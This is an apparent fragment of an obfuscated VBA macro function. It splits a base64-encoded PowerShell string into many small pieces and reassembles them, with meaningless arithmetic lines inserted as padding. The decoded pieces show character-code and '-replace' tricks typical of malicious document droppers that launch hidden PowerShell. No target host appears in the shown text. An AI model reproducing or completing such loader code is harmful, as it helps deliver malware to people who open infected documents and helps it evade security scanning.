oSLKP = "AGMAa" + "ABBAFIAXQA0AD" + "kAKwB" + "bAGMAaABBAFI" + "AXQA3ADg" + "AKQAsAFsAYwBo" + "AEEAUgBdADMAO"
cAFGn = (jkFcS * HIZii - wSammL * Round(61315)) + (31840 - Rnd(jlpWZ) + 42242 + jIPOU)
XBszX = "QAgAC0AcgBl" + "AHAAbA" + "BBAEM" + "AZQAg" + "ACAAKABb" + "AGMAaABBAFIAXQ" + "A3ADAAKwBbAGM" + "AaABBAFIAXQ" + "AxADAANAArAFsA"
iibvaz = (TbwlFi * wqNuaW - wzPFs * Round(87876)) + (85435 - Rnd(RTTSSj) + 86151 + rljpr)
ODdPia = "YwBoAE" + "EAUgBdADEAMA" + "AyACkALABbAGM" + "AaABBAFIAXQAz" + "ADYAIA"
oERqs = (pvVoz * ljMphF - qKdRmQ * Round(89223)) + (6476 - Rnd(VJuhMo) + 20642 + oCBZn)
JdSZDTioXb = "AtAHIAZQ" + "BwAGwAQQB" + "DAGUAIAAnADAA" + "TgBjACcALABbA" + "GMAaABBAF" + "IAXQAzADQAKQ" + "AgACkA"
SKURCwT = oSLKP + XBszX + ODdPia + JdSZDTioXb
End Function